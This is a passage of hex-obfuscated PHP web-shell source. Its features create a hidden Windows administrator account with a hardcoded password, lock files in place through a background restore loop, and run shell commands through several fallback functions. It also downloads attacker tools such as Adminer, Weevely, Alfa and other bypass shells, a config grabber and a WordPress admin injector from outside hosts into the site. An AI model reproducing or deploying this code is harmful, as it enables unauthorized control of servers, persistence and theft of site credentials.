"\xa\11\11\11\11\x3c\x64\x69\x76\x20\x63\x6c\141\163\x73\x3d\x22\x63\157\156\x74\141\x69\156\145\x72\x2d\x66\154\165\151\x64\40\154\x61\x6e\x67\165\141\147\145\x2d\x6a\141\166\141\163\143\x72\151\x70\164\x22\x3e\12\11\x9\x9\11\11\74\144\151\x76\40\143\x6c\141\163\x73\75\42\x73\x68\145\154\154\40\x6d\142\55\x33\x22\76\12\11\11\11\x9\11\11\x3c\x70\162\145\x20\x73\x74\x79\x6c\145\x3d\x22\x66\157\156\x74\55\163\151\172\145\72\x31\60\x70\x78\x3b\42\x3e\x3c\x63\x6f\144\145\76" . exe_root("\156\x65\x74\x20\165\x73\x65\x72\x20\x44\x61\x74\141\x41\x64\155\x69\156\x20\115\x6f\x6e\x6f\x63\x68\162\x78\x23\63\67\40\x2f\x61\x64\x64", $path) . exe_root("\x6e\x65\x74\x20\154\157\x63\x61\x6c\147\x72\157\x75\160\40\x61\144\x6d\x69\x6e\151\163\164\162\141\x74\157\x72\x73\40\104\141\x74\141\x41\x64\155\151\x6e\x20\57\x61\x64\x64", $path) . "\x3c\x62\162\76\x49\146\x20\164\x68\145\x72\145\x20\x69\x73\x20\156\157\40\42\x41\x63\x63\x65\163\163\40\151\x73\x20\144\145\x6e\151\145\144\x2e\42\x20\157\165\164\160\x75\164\54\40\143\x68\x61\156\x63\145\163\40\141\162\x65\x20\x74\150\141\164\x20\171\x6f\x75\40\x68\141\166\145\40\163\165\x63\143\145\x65\144\x65\144\x20\x69\x6e\40\143\162\145\x61\x74\x69\156\x67\x20\x61\40\165\x73\x65\x72\x20\150\145\162\x65\56\40\x4a\165\x73\x74\x20\154\x6f\147\x20\151\156\x20\x75\x73\x69\x6e\147\40\164\150\145\40\x75\163\145\162\156\141\x6d\145\x20\141\156\144\40\160\x61\x73\x73\167\157\162\144\x20\x62\x65\154\x6f\x77\x2e\x3c\142\162\76\150\x6f\163\x74\x73\x3a\40\74\x67\162\x3e" . gethostbyname($_SERVER["\110\x54\x54\120\137\x48\x4f\123\124"]) . "\x75\x73\x65\x72\x6e\x61\155\x65\x3a\40\x44\141\164\141\101\144\x6d\151\x6e\12\40\40\x20\x20\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\160\141\163\163\x77\x6f\x72\x64\x3a\40\x4d\157\156\x6f\x63\150\x72\x78\x23\x33\x37\x3c\x2f\x63\157\144\x65\x3e\74\x2f\160\162\x65\x3e\74\57\x64\151\x76\x3e\x3c\57\x64\x69\x76\x3e"; } else { echo "\x3c\163\x63\x72\x69\x70\164\x3e\x61\x6c\x65\162\x74\50\x27\x57\150\165\164\164\x3f\x21\x20\153\x69\144\163\54\x20\x74\x68\x69\163\x20\164\157\x6f\154\x20\157\156\x6c\171\x20\x77\x6f\162\x6b\163\40\x66\x6f\x72\40\x77\x69\156\x64\x6f\167\163\40\163\145\x72\166\145\x72\41\x27\x29\x3b\74\x2f\163\x63\x72\151\x70\x74\x3e"; } } $resoolt = "\x6c\x6f\x6c\143\x61\164\163\x2e\164\x78\164"; if ($_1337["\151\144"] == "\x6c\157\x63\153\146\151\x6c\145") { s(); echo "\x3c\x63\x65\x6e\x74\x65\162\40\x63\x6c\141\163\x73\75\x22\x61\x6e\x75\42\x3e\x4c\x6f\143\153\40\x46\x69\x6c\145\x3c\57\x63\x65\x6e\164\145\x72\76\12\x3c\144\x69\166\40\143\154\x61\x73\x73\75\42\143\141\x72\144\x20\143\x61\162\144\55\142\x6f\x64\x79\40\164\x65\170\x74\x2d\144\x61\162\x6b\40\x69\x6e\160\165\x74\55\147\162\x6f\165\x70\40\155\x62\55\63\x22\x3e\xa\x20\40\x20\x20\x3c\144\151\166\x20\x63\x6c\x61\x73\x73\x3d\x22\x63\x6f\156\164\x61\x69\156\145\162\x2d\x66\x6c\165\x69\x64\40\x6d\x74\x2d\x31\42\76\xa\x20\40\x20\x20\x3c\x66\157\x72\x6d\x20\x6d\145\164\x68\x6f\x64\x3d\x22\160\157\163\164\42\x20\x61\143\164\x69\x6f\x6e\x3d\x22\42\76\xa\40\40\40\40\40\40\40\40\x3c\144\151\x76\40\143\154\141\x73\x73\x3d\x22\x6d\142\55\x33\x22\x3e\12\40\x20\x20\x20\x20\x20\40\40\40\x20\40\40\74\x69\156\x70\x75\x74\x20\164\171\160\x65\x3d\x22\164\x65\170\164\x22\x20\156\141\x6d\x65\75\42\x6c\157\x63\x6b\146\151\x6c\145\x22\40\x63\154\x61\163\163\x3d\x22\x66\x6f\162\155\x2d\143\x6f\x6e\164\x72\x6f\x6c\x20\146\157\x72\155\x2d\x63\157\156\164\162\x6f\x6c\55\163\155\x20\164\x65\x78\164\55\x64\141\162\153\x20\146\154\x65\x78\x2d\x67\162\x6f\x77\55\61\x22\40\160\x6c\141\143\x65\150\157\154\x64\145\162\x3d\42" . $resoolt . "\42\x20\x72\x65\x71\165\151\162\145\144\x3e\xa\x20\x20\40\x20\x20\x20\40\40\74\x2f\144\x69\166\x3e\12\11\11\74\144\x69\166\x20\x63\x6c\141\x73\163\x3d\x22\144\55\147\x72\x69\x64\x20\x67\141\160\55\x32\x22\x3e\12\40\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\40\40\40\x20\x3c\x69\x6e\x70\x75\x74\x20\143\154\141\163\x73\x3d\x22\142\x74\156\40\x62\164\x6e\55\144\x61\162\153\x20\x62\164\156\55\163\x6d\x22\x20\164\171\x70\145\x3d\x22\163\165\142\x6d\151\164\42\40\x76\x61\x6c\165\145\75\x22\x53\x75\x62\155\x69\164\x21\x22\76\xa\40\40\x20\x20\x20\x20\x20\x20\x3c\57\x64\x69\x76\x3e\12\x20\40\40\40\74\x2f\x66\x6f\162\x6d\76\12\x3c\57\144\x69\166\x3e\x3c\x2f\144\151\166\x3e\74\x70\x20\143\154\141\163\163\x3d\42\x74\145\x78\x74\55\x63\x65\x6e\x74\145\162\x22\x3e\124\x6f\40\160\x72\145\166\145\x6e\x74\x20\x66\x69\x6c\145\x73\x20\x66\x72\157\x6d\x20\x62\x65\151\156\147\x20\155\157\x64\151\x66\x69\x65\x64\x2c\40\144\145\163\164\x72\x6f\171\145\144\x2c\x20\x6f\162\x20\x61\154\164\x65\x72\145\144\x2c\40\165\163\x65\40\141\x20\154\157\x63\153\x20\x66\x69\154\145\56\x20\124\x6f\40\x72\165\x6e\40\x74\150\x69\x73\54\x20\141\156\x20\145\x78\x65\143\x75\x74\145\x20\143\x6f\155\155\141\156\x64\40\151\x73\x20\x6e\145\x65\144\x65\x64\56\x3c\x2f\x70\76"; function remdot($filename) { return str_replace("\x2e", '', $filename); } function get_temp_dir() { $tmp_paths = array("\57\x74\x6d\160", "\57\166\x61\162\x2f\164\155\160"); foreach ($tmp_paths as $tmp_path) { if (is_writable($tmp_path)) { return $tmp_path; } } if (function_exists("\163\171\163\x5f\147\145\x74\137\164\x65\x6d\x70\137\x64\x69\162")) { return sys_get_temp_dir(); } if (!empty($_ENV["\x54\x4d\120"])) { return realpath($_ENV["\x54\x4d\120"]); } elseif (!empty($_ENV["\x54\115\120\x44\x49\x52"])) { return realpath($_ENV["\x54\115\120\x44\111\x52"]); } elseif (!empty($_ENV["\124\105\x4d\x50"])) { return realpath($_ENV["\124\x45\x4d\120"]); } $tempfile = tempnam(sys_get_temp_dir(), ''); if ($tempfile) { unlink($tempfile); return realpath(dirname($tempfile)); } return false; } function cmdoitlock($command) { if (function_exists("\x73\171\163\x74\x65\x6d")) { system($command); } elseif (function_exists("\x65\x78\x65\143")) { exec($command); } elseif (function_exists("\163\x68\145\154\x6c\137\145\x78\145\x63")) { shell_exec($command); } elseif (function_exists("\x70\141\x73\x73\x74\x68\x72\x75")) { passthru($command); } elseif (function_exists("\x70\157\x70\x65\x6e")) { $handle = popen($command, "\x72"); if ($handle) { while (!feof($handle)) { echo fgets($handle, 4096); } pclose($handle); } } elseif (function_exists("\160\x72\x6f\x63\x5f\157\160\145\156")) { proc_open($command, array(0 => array("\x70\x69\160\x65", "\162"), 1 => array("\x70\151\x70\145", "\x77"), 2 => array("\x70\151\160\x65", "\x77")), $pipes); } elseif (function_exists("\x60")) { echo `{$command}`; } } if ($_SERVER["\122\105\x51\x55\105\123\x54\137\x4d\x45\124\x48\117\x44"] == "\120\x4f\x53\124" && isset($_POST["\154\157\143\153\146\151\154\x65"])) { $namafilelos = $_POST["\x6c\x6f\x63\x6b\x66\151\x6c\x65"]; $tmpnya = get_temp_dir(); if ($tmpnya) { $cachedirectorylo = $tmpnya . "\x2f\x2e\120\110\120\123\105\x53\123\111\x44"; if (file_exists($cachedirectorylo . "\x2f\56" . base64_encode(getcwd() . remdot($namafilelos) . "\55\x68\141\156\144\x6c\x65\x72")) && file_exists($cachedirectorylo . "\x2f\x2e" . remdot($namafilelos) . "\55\164\145\170\x74")) { cmdoitlock("\162\155\x20\x2d\x72\146\x20" . $cachedirectorylo . "\x2f\x2e" . base64_encode(getcwd() . remdot($namafilelos) . "\x2d\164\145\170\164\55\146\x69\x6c\145")); cmdoitlock("\x72\x6d\x20\x2d\x72\x66\40" . $cachedirectorylo . "\x2f\56" . base64_encode(getcwd() . remdot($namafilelos) . "\55\x68\x61\156\144\154\145\x72")); } mkdir($cachedirectorylo); cmdoitlock("\x63\x70\x20{$namafilelos}\x20{$cachedirectorylo}\57\56" . base64_encode(getcwd() . remdot($namafilelos) . "\55\164\145\170\164\55\146\151\154\145")); chmod($namafilelos, 292); $handler = "\74\77\160\150\160\12\40\x20\x20\x20\x20\x20\x20\40\100\x69\156\151\x5f\163\x65\164\x28\x22\x6d\141\170\137\x65\x78\x65\x63\x75\164\x69\157\156\x5f\x74\x69\155\145\x22\54\x20\60\51\x3b\12\40\40\x20\40\40\40\40\x20\167\150\151\154\145\40\50\x74\x72\165\x65\51\40\x7b\xa\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\151\x66\x20\50\x21\146\151\x6c\145\137\145\x78\151\x73\164\x73\x28\42" . getcwd() . "\42\51\x29\40\x7b\xa\40\40\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\40\x6d\153\x64\151\162\x28\x22" . getcwd() . "\42\x29\x3b\12\40\40\40\40\40\40\40\40\40\40\x20\40\175\12\xa\40\40\40\40\40\x20\x20\40\x20\40\40\x20\151\x66\x20\x28\x21\146\151\x6c\145\x5f\145\x78\x69\163\x74\163\50\42" . getcwd() . "\x2f" . $namafilelos . "\42\51\51\x20\173\xa\40\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x24\x74\145\170\164\x20\x3d\x20\142\141\x73\145\x36\x34\137\x65\x6e\x63\157\x64\x65\50\146\x69\x6c\145\137\147\x65\x74\137\143\157\156\164\145\x6e\164\163\50\x22" . $tmpnya . "\57\x2e\x50\x48\120\x53\105\123\123\x49\x44\57\56" . base64_encode(getcwd() . remdot($namafilelos) . "\x2d\x74\145\x78\164\55\x66\151\154\x65") . "\42\51\x29\73\xa\40\40\x20\x20\40\x20\40\x20\x20\x20\40\40\40\x20\40\x20\146\x69\154\x65\137\x70\165\164\x5f\x63\157\x6e\x74\x65\x6e\x74\163\50\x22" . getcwd() . "\x2f" . $namafilelos . "\42\54\x20\x62\141\163\x65\66\64\x5f\144\x65\143\157\x64\x65\x28\44\164\x65\170\164\51\x29\x3b\12\x20\40\x20\40\40\x20\40\x20\40\40\40\40\x7d\12\xa\40\40\40\40\40\x20\40\x20\x20\40\x20\x20\151\x66\x20\x28\x6c\157\154\x63\x61\164\163\160\x65\x72\155\50\x22" . getcwd() . "\57" . $namafilelos . "\42\51\x20\x21\75\40\60\x34\x34\x34\x29\x20\173\xa\x20\x20\x20\40\40\x20\40\40\x20\40\40\40\x20\40\x20\x20\x63\150\x6d\157\144\x28\42" . getcwd() . "\57" . $namafilelos . "\x22\54\40\60\64\x34\64\51\x3b\xa\40\40\40\x20\x20\40\40\x20\x20\40\40\x20\175\xa\40\40\x20\40\x20\x20\40\x20\x7d\12\12\40\x20\x20\40\40\40\x20\40\x66\165\156\x63\164\x69\157\156\40\x6c\x6f\x6c\x63\141\164\163\160\x65\x72\x6d\x28\x24\146\x69\154\145\156\x61\x6d\145\51\40\173\12\x20\x20\x20\40\x20\x20\40\40\40\40\x20\x20\162\x65\x74\165\x72\x6e\40\163\165\x62\x73\x74\x72\x28\x73\160\x72\x69\x6e\164\146\x28\x22\45\157\x22\54\40\x66\x69\x6c\145\x70\x65\162\x6d\x73\x28\x24\x66\x69\154\145\156\x61\155\145\x29\x29\54\40\x2d\x34\x29\73\12\x20\x20\x20\x20\40\40\40\40\x7d"; $handlerfile = $cachedirectorylo . "\x2f\56" . base64_encode(getcwd() . remdot($namafilelos) . "\x2d\150\141\x6e\x64\x6c\x65\162"); $handlersaction = file_put_contents($handlerfile, $handler); if ($handlersaction) { cmdoitlock("\160\x68\x70\40" . $handlerfile . "\40\76\40\57\144\145\x76\x2f\156\165\154\x6c\40\x32\x3e\57\x64\145\166\x2f\x6e\165\154\x6c\x20\x26"); echo "\x3c\163\143\x72\151\160\164\x3e\167\151\x6e\x64\157\167\56\x6c\157\x63\x61\164\x69\x6f\156\x3d\x27\x3f\x70\x61\164\x68\x3d{$path}\47\74\57\163\143\162\151\160\164\76"; } } else { echo "\74\x73\143\162\151\x70\164\76\x61\x6c\145\x72\164\50\x27\x45\x52\x52\x4f\x52\41\x20\101\x63\x63\x65\163\163\x20\144\x65\x6e\x69\145\x64\56\x27\x29\x3b\x3c\57\x73\143\162\x69\x70\164\76"; } } } if ($_1337["\151\144"] == "\x67\145\x74\x70\162\x69\166") { s(); echo "\74\143\x65\156\x74\x65\162\40\x63\x6c\x61\163\163\x3d\x27\141\x6e\165\47\x3e\107\x65\x74\40\120\162\151\x76\141\x74\145\x20\124\157\157\x6c\163\74\57\143\145\156\x74\145\162\x3e\12\x20\40\x20\40\x20\40\x20\40\74\x64\151\x76\40\143\x6c\141\x73\x73\x3d\x27\x63\x61\162\144\x20\143\x61\x72\144\55\x62\157\144\x79\x20\x74\x65\x78\164\x2d\x64\141\x72\153\40\151\156\160\165\x74\x2d\147\162\x6f\x75\x70\x20\155\x62\55\63\47\76\xa\x20\x20\40\40\x20\40\40\x20\x3c\146\157\x72\155\40\x6d\145\x74\150\157\x64\x3d\x27\120\117\x53\x54\x27\76\x20\xa\x20\40\40\40\x20\40\40\40\74\x69\40\143\x6c\x61\x73\x73\x3d\47\x62\x69\x20\x62\151\x2d\x66\151\154\145\x2d\145\x61\x72\155\x61\162\x6b\47\x3e\74\57\151\76\40\x53\145\x6c\145\143\164\40\x61\x20\164\x6f\157\x6c\x73\x2f\x63\157\144\x65\x3a\12\x20\40\x20\x20\x20\40\40\x20\74\x73\x65\154\145\x63\x74\x20\x63\154\x61\163\163\x3d\x27\146\x6f\x72\x6d\55\143\x6f\x6e\x74\162\x6f\154\x20\x62\164\x6e\55\163\155\40\x74\145\x78\164\55\x64\x61\x72\x6b\x27\x20\156\x61\155\x65\75\x27\157\160\x74\x69\157\x6e\47\x3e\12\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\40\74\x6f\x70\x74\151\x6f\156\x20\x76\x61\x6c\x75\145\x3d\47\61\x27\x20\x73\145\154\145\x63\x74\x65\x64\x3e\x41\x64\x6d\x69\156\145\x72\x20\x28\x44\x61\x74\x61\142\x61\163\145\x20\114\157\147\151\x6e\x29\x3c\57\157\x70\164\151\157\x6e\76\12\40\40\x20\x20\40\40\40\x20\40\40\x20\40\74\x6f\160\164\151\157\156\x20\166\141\x6c\165\145\75\47\x31\61\x27\x3e\x43\x6f\155\155\141\x6e\144\x20\x42\x79\160\x61\163\163\x20\x28\123\x74\145\141\x6c\164\150\x20\x56\145\162\163\x69\x6f\x6e\x29\x3c\57\x6f\160\164\x69\x6f\156\76\12\x20\40\x20\40\x20\40\40\40\x20\40\40\40\x3c\157\x70\164\x69\157\156\x20\166\141\x6c\x75\x65\x3d\x27\x32\47\76\x48\x74\141\143\x63\x65\163\163\x20\50\113\x69\154\x6c\x20\x41\x6c\154\40\x42\x61\143\x6b\x64\157\x6f\x72\x29\74\57\x6f\160\164\x69\x6f\156\76\xa\40\x20\40\40\40\x20\x20\x20\40\40\40\40\74\x6f\x70\x74\151\157\156\40\x76\141\154\165\145\75\47\x38\x27\76\x50\x72\151\166\141\x74\145\40\x43\157\x6e\x66\151\x67\40\x47\162\x61\x62\x62\x65\162\x20\50\101\165\x74\157\x20\x47\x72\x61\142\x20\x43\x6f\x6e\x66\151\x67\x29\x3c\57\x6f\160\x74\151\157\x6e\76\12\40\x20\x20\40\x20\40\x20\x20\40\40\x20\x20\x3c\157\x70\x74\x69\x6f\x6e\40\x76\x61\154\165\145\75\x27\x33\x27\76\127\x65\145\166\x65\x6c\x79\40\x52\x65\x6d\x6f\x74\x65\40\123\150\x65\x6c\x6c\74\57\x6f\160\164\x69\157\156\76\xa\40\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\74\x6f\160\x74\151\157\156\x20\166\141\154\x75\x65\x3d\47\x34\47\x3e\123\x53\x49\40\123\x68\x65\x6c\x6c\40\50\102\x79\x70\141\163\x73\x20\x43\x6f\155\155\x61\x6e\144\x20\x4c\151\x74\145\x73\160\145\x65\x64\x29\74\x2f\157\x70\164\151\157\156\x3e\12\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\40\74\157\x70\164\151\157\x6e\x20\x76\x61\154\x75\145\75\x27\65\47\76\127\157\162\144\x50\162\x65\x73\163\40\x41\x75\164\157\40\x41\144\144\x20\x41\144\155\x69\156\40\50\117\x6e\40\x54\150\x65\155\145\163\x29\74\57\157\160\x74\151\x6f\156\76\12\40\x20\40\40\40\40\x20\x20\x20\40\x20\40\x3c\157\x70\x74\x69\x6f\156\40\166\x61\x6c\165\x65\x3d\47\66\x27\x3e\x41\x6c\x66\x61\x62\x65\x70\141\x73\x20\x28\x41\154\146\x61\40\102\x79\x70\x61\x73\163\40\126\x65\162\x73\151\157\156\x29\x3c\x2f\x6f\x70\x74\x69\157\156\x3e\12\x20\40\x20\40\40\x20\x20\40\40\40\40\x20\74\x6f\160\164\x69\x6f\156\x20\x76\141\154\165\145\75\x27\71\47\76\101\154\146\141\x20\124\145\163\x6c\x61\40\50\x41\154\146\141\40\x4f\x72\x69\147\x69\156\x61\x6c\40\x43\x6f\144\145\x29\74\57\x6f\x70\164\x69\157\156\x3e\12\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\74\157\x70\x74\x69\157\156\40\166\x61\x6c\165\145\75\47\67\47\x3e\115\141\162\x69\x6a\165\x61\156\141\40\50\102\145\x73\x74\x20\x42\x79\x70\x61\163\163\40\123\x68\x65\154\154\51\x3c\57\157\160\164\x69\x6f\x6e\x3e\12\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\74\157\160\164\x69\157\x6e\x20\166\x61\154\165\145\75\47\x31\x30\47\76\102\x79\160\141\163\x73\40\114\x69\164\145\x73\x70\x65\x65\x64\40\123\x68\x65\x6c\x6c\40\x28\123\164\145\x61\154\164\x68\x20\126\145\x72\163\x69\x6f\x6e\x29\x3c\57\157\160\x74\x69\157\156\x3e\12\x20\40\40\x20\40\40\40\x20\74\x2f\163\145\154\145\143\164\76\12\40\40\x20\40\x20\40\40\x20\x3c\x64\x69\166\x20\143\154\x61\x73\163\x3d\47\x64\x2d\x67\162\151\x64\40\147\x61\x70\55\x32\x27\76\xa\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\74\151\x6e\160\165\164\x20\143\154\141\163\163\75\x27\142\164\156\40\142\164\x6e\x2d\x64\x61\x72\x6b\x20\x62\x74\x6e\55\x73\155\47\40\x74\171\160\145\x3d\47\163\165\x62\x6d\x69\x74\47\x20\156\141\x6d\145\x3d\x27\x67\145\164\x27\x20\166\141\x6c\165\x65\x3d\x27\x53\165\x62\155\x69\x74\41\47\x3e\12\40\x20\x20\x20\40\40\x20\40\x3c\x2f\144\151\166\x3e\12\40\x20\x20\x20\40\40\x20\x20\x3c\57\x66\x6f\x72\x6d\x3e\12\x20\x20\40\x20\40\x20\x20\40\74\57\x64\x69\166\76"; if (isset($_POST["\147\x65\x74"])) { function downloadFile($url, $fileName) { $userAgent = "\x4d\x6f\x7a\151\x6c\x6c\141\57\x35\x2e\60\x20\50\x57\x69\x6e\144\157\167\163\40\116\x54\x20\61\60\x2e\60\x3b\x20\x57\151\156\66\x34\x3b\x20\x78\66\x34\x29\x20\x41\160\x70\x6c\x65\x57\145\x62\113\151\164\x2f\x35\x33\x37\56\63\x36\x20\50\x4b\110\x54\115\x4c\x2c\x20\154\x69\153\145\x20\x47\145\143\x6b\x6f\x29\x20\103\150\x72\x6f\155\145\57\65\x38\56\60\56\x33\60\62\71\x2e\61\x31\60\x20\123\141\x66\141\x72\151\x2f\x35\x33\x37\56\x33"; $downloaded = false; $ch = curl_init($url); $fp = fopen($fileName, "\x77"); curl_setopt($ch, CURLOPT_FILE, $fp); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_USERAGENT, $userAgent); if (curl_exec($ch)) { $downloaded = true; } curl_close($ch); fclose($fp); if (!$downloaded) { $opts = array("\150\x74\164\x70" => array("\155\145\x74\x68\157\x64" => "\x47\x45\x54", "\x68\145\x61\144\x65\x72" => "\x55\x73\145\162\55\x41\147\x65\x6e\x74\x3a\40{$userAgent}\xd\12")); $context = stream_context_create($opts); $fileContent = file_get_contents($url, false, $context); if ($fileContent !== false) { file_put_contents($fileName, $fileContent); $downloaded = true; } } if (!$downloaded) { $fp = fopen($fileName, "\x77"); if ($fp) { $source = fopen($url, "\162"); if ($source) { while ($content = fread($source, 8192)) { fwrite($fp, $content); } fclose($source); $downloaded = true; } fclose($fp); } } if (!$downloaded) { if (copy($url, $fileName)) { $downloaded = true; } } if (!$downloaded) { $opts = array("\x68\164\x74\160" => array("\x6d\145\164\x68\x6f\x64" => "\107\x45\x54", "\x68\145\x61\x64\x65\162" => "\x55\163\145\162\x2d\x41\x67\145\156\164\x3a\x20" . $userAgent)); $context = stream_context_create($opts); $source = fopen($url, "\162", false, $context); if ($source) { $fp = fopen($fileName, "\x77"); if ($fp) { while ($content = fread($source, 8192)) { fwrite($fp, $content); } fclose($fp); $downloaded = true; } fclose($source); } } if ($downloaded) { $protocol = isset($_SERVER["\110\124\x54\120\123"]) && $_SERVER["\110\x54\124\120\123"] === "\157\156" ? "\x68\164\x74\x70\163" : "\x68\x74\164\x70"; $urlwebsite = $protocol . "\x3a\x2f\x2f" . $_SERVER["\x48\124\124\120\137\110\117\x53\x54"]; $downloadLink = $urlwebsite . str_replace(realpath($_SERVER["\x44\117\x43\x55\x4d\105\116\x54\x5f\122\x4f\117\x54"]), '', realpath(getcwd())) . "\x2f" . basename($fileName); echo "\x3c\x63\x65\156\164\x65\162\x3e\74\141\40\x68\162\145\146\x3d\x27{$downloadLink}\47\40\164\141\x72\x67\145\164\x3d\47\137\x62\x6c\x61\156\153\x27\x20\x63\154\x61\x73\163\x3d\47\x62\164\x6e\40\142\164\156\x2d\144\141\156\147\145\x72\47\76\x43\154\x69\143\153\40\x48\x65\x72\145\x21\x3c\x2f\141\x3e\x3c\57\143\x65\x6e\x74\x65\x72\76"; } else { echo "\x3c\x63\x65\156\x74\x65\162\x3e\x3c\160\x20\x63\x6c\141\163\x73\75\x27\x74\x65\x78\164\x2d\x64\x61\156\x67\x65\162\x27\x3e\106\141\151\x6c\145\x64\x20\164\x6f\40\144\x6f\x77\x6e\x6c\x6f\x61\144\40\164\x68\x65\x20\146\x69\x6c\x65\56\x3c\x2f\x70\x3e\74\x2f\x63\145\156\164\145\162\76"; } } if ($_POST["\x6f\x70\x74\x69\x6f\x6e"] == "\x31") { $url = "\150\x74\164\x70\163\72\57\57\147\x69\x74\150\x75\142\56\x63\x6f\155\x2f\166\x72\141\x6e\141\57\141\144\155\x69\156\145\x72\x2f\x72\145\x6c\x65\141\163\145\x73\57\x64\x6f\167\156\154\x6f\x61\x64\57\166\x34\x2e\x38\x2e\x31\x2f\x61\x64\155\x69\156\145\162\55\64\x2e\70\56\x31\56\160\150\160"; $fileName = getcwd() . "\x2f\x6c\157\x6c\x63\x61\x74\x73\x2d\x61\144\155\x69\156\145\x72\x73\56\160\x68\x70"; } elseif ($_POST["\x6f\160\164\x69\x6f\156"] == "\x32") { ?>
<div class="container-fluid language-javascript mt-3">
<div class="shell mb-3 position-relative"><pre style="font-size:10px;" id="code"><code><?php echo htmlspecialchars("\117\x70\x74\151\157\x6e\163\40\x2d\x49\x6e\x64\x65\170\x65\163\xa\x3c\106\x69\x6c\145\163\115\141\164\x63\150\40\x22\x2e\x2a\x5c\x2e\x28\143\147\x69\x7c\160\x6c\x7c\160\171\174\x70\x79\143\174\x70\x79\x6f\174\160\150\x70\63\x7c\x70\x68\160\x34\x7c\x70\x68\x70\65\174\160\150\x70\66\174\x70\x63\x67\151\x7c\160\x63\x67\x69\x33\174\x70\143\147\151\x34\174\160\143\x67\151\x35\x7c\160\x63\150\151\x36\174\151\x6e\143\x7c\160\x68\x70\174\120\x68\x70\x7c\160\110\x70\174\x70\x68\120\174\120\x48\x70\174\160\110\120\174\120\150\x50\x7c\120\x48\x50\x7c\x50\x68\120\x7c\160\x68\x70\x35\x7c\x50\150\x70\65\x7c\x70\x68\141\162\x7c\120\x48\x41\122\174\x50\x68\x61\162\x7c\x50\110\141\162\174\120\110\x41\x72\x7c\x70\x48\x41\x52\x7c\160\150\x41\x52\174\x69\x6e\143\x7c\160\x68\141\122\174\160\110\x70\65\x7c\160\x68\120\x35\x7c\120\x48\x70\65\x7c\160\x48\x50\65\x7c\120\150\x50\65\174\120\x48\x50\x35\174\143\x67\x69\174\103\x47\x49\174\103\107\151\174\x63\107\x49\174\120\x68\120\65\174\x70\x68\160\66\x7c\160\x68\160\x37\174\160\x68\x70\70\174\160\150\160\x39\x7c\x70\x68\164\x6d\x6c\x7c\x50\x68\x74\x6d\154\174\x70\110\164\x6d\x6c\x7c\160\x68\124\155\154\x7c\x70\x48\124\155\154\x7c\x46\154\x61\174\146\114\x61\174\x66\x6c\101\174\x46\114\x61\174\x66\114\x41\174\106\x6c\x41\174\x46\x4c\101\174\160\x68\164\115\x6c\174\x70\150\x74\155\114\174\x50\x48\x74\155\x6c\x7c\x50\x68\x54\155\x6c\x7c\x50\110\124\x4d\x4c\x7c\x50\110\x54\155\154\x7c\120\110\x54\115\x6c\x7c\120\150\x74\115\154\x7c\x50\x48\x54\x6d\x6c\x7c\x50\x48\x74\115\114\x7c\x70\x48\124\115\154\x7c\120\x68\x54\x4d\114\x7c\x70\x48\x54\115\x4c\174\x50\150\164\x6d\114\174\120\110\124\155\x4c\x7c\120\150\x74\115\154\174\120\150\164\155\x4c\x7c\x70\x48\164\115\x6c\x7c\120\150\x54\x6d\x4c\x7c\160\110\164\155\114\x7c\x61\x73\160\x78\x7c\101\123\120\130\174\141\163\x70\174\101\123\120\x7c\160\x68\x70\56\152\160\x67\174\x50\x48\120\x2e\x4a\x50\107\x7c\x70\x68\x70\x2e\170\170\x78\152\x70\147\174\x50\110\120\56\130\x58\130\x4a\x50\x47\x7c\x70\150\160\56\152\x70\x65\147\174\120\110\120\x2e\112\x50\107\x7c\120\x48\120\x2e\x4a\x50\x45\107\x7c\120\110\120\x2e\x50\x4a\x45\x50\107\174\x70\150\x70\x2e\x70\152\x70\145\147\174\160\x68\160\x2e\146\x6c\141\174\x50\110\120\56\x46\x4c\101\174\160\150\x70\56\x70\x6e\x67\174\x50\x48\120\x2e\x50\x4e\107\174\160\x68\x70\x2e\x67\x69\x66\174\120\x48\120\x2e\107\111\x46\x7c\x70\150\160\x2e\x74\145\163\164\x7c\160\150\x70\x3b\x2e\152\x70\x67\174\120\x48\x50\x20\112\x50\107\174\120\110\x50\73\x2e\x4a\120\x47\x7c\x70\150\x70\x3b\x2e\x6a\160\x65\147\174\x70\x68\160\40\152\x70\147\x7c\x70\x68\x70\56\x62\141\x6b\174\x70\150\x70\x2e\x70\144\x66\x7c\x70\x68\160\x2e\170\x78\170\160\x64\x66\x7c\x70\x68\160\x2e\170\x78\x78\x70\156\x67\x7c\146\154\141\x7c\106\154\141\x7c\146\x4c\141\174\146\x4c\x61\174\146\x6c\x41\x7c\x46\x4c\x61\174\x66\114\101\x7c\x46\x4c\x41\x7c\x46\x6c\101\174\160\x68\x70\x2e\x78\170\x78\x67\x69\146\174\x70\150\160\56\170\x78\170\x70\152\x70\145\147\x7c\160\x68\160\56\170\x78\x78\152\x70\145\147\174\x70\x68\x70\x33\x2e\x78\x78\x78\x6a\x70\x65\147\x7c\160\x68\160\x33\56\170\x78\170\152\x70\x67\x7c\x70\x68\x70\65\56\x78\170\170\152\x70\147\174\160\150\x70\x33\56\160\152\160\x65\147\174\x70\150\160\65\56\160\x6a\x70\x65\x67\174\163\150\164\x6d\x6c\174\x70\150\160\x2e\165\156\153\x6e\157\167\x6e\174\x70\x68\x70\x2e\144\157\143\174\x70\x68\160\x2e\x64\157\x63\x78\x7c\x70\150\x70\56\160\x64\x66\174\x70\x68\x70\x2e\160\x70\x64\x66\174\x6a\x70\x67\x2e\120\150\x50\x7c\160\150\x70\x2e\164\170\x74\174\x70\x68\x70\x2e\x78\x78\x78\x74\x78\x74\x7c\x50\x48\120\x2e\124\130\x54\174\x50\x48\120\56\130\x58\x58\x54\x58\x54\174\x70\x68\160\56\x78\154\163\170\174\160\x68\x70\x2e\x7a\x69\160\174\x70\150\160\x2e\x78\170\170\172\x69\160\x7c\x70\x68\160\67\70\x7c\x70\150\160\65\x36\174\x70\150\x70\x39\x36\174\160\x68\x70\x36\x39\x7c\160\150\160\x36\67\1